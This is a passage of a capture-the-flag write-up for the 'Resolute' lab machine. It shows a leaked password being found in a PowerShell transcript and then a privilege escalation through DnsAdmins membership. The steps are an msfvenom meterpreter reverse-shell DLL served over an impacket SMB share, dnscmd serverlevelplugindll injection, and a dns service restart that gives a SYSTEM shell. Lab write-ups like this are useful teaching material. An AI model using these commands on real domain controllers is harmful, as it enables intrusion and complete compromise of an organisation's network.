PS > type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************It’s a PS log file and a dumb mistake is leaking us ryan password !
cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!
We can now use it account to gather more information about him.
C:\Windows\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Ryan is member of two groups actually, Contractors and DnsAdmins which is an alias for the first group. Googling DnsAdmin give us some information about a possible privilege escaladation for member belonging to this group.
[https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83)
I will not details the exploit side but only the pentest side here, just follow the links if you wan more information. Quickly, the dns service run as system and DnsAdmin group member can inject dll in order to modify the process behavior
At first sight I though I will have to compile myself the DLL, thing that is pretty balls breaking but I fell on this nice stuff : http://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/
We can juste use a msf payload made with msfvenom to get our reverse shell really quickly and use our computer to host the payload through a smb share running thanks to impacket ! Not hosting a msf payload on the target is a good way to not be rected by the AV which is running (Win defender) and which will delete our payload from disk.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=4444 --platform=windows -f dll > share/dns.dll
$ python2 ./smbserver.py swtch ~/nextcloud/challenges/HTB/resolute/share Before starting exploiting the service, it’s preferable to check if the share is available from the victime.
PS > net view \\10.10.14.37\
Shared resources at \\10.10.14.37\
(null)
Share name Type Used as Comment
-------------------------------------------------------------------------------
SWTCH Disk
The command completed successfully.
PS > Get-ChildItem \\10.10.14.37\SWTCH
Directory: \\10.10.14.37\SWTCH
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/11/2020 2:29 AM 5120 dns.dll Everything is perfect, we even see the logs in impacket console
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,62171)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SWTCH)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,62171)
[*] Remaining connections [Let’s run the poc
PS > dnscmd.exe /config /serverlevelplugindll \\10.10.14.37\SWTCH\dns.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS > sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS > sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3632
FLAGS : w00t !
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
8 meterpreter x64/windows NT AUTHORITY\SYSTEM @ RESOLUTE 10.10.14.37:4444 -> 10.10.10.169:62407 (10.10.10.169)
msf5 exploit(multi/handler) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > shell
Process 2840 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
e1d94876a506850d0c20edb5405e619c
C:\Windows\system32>We are root.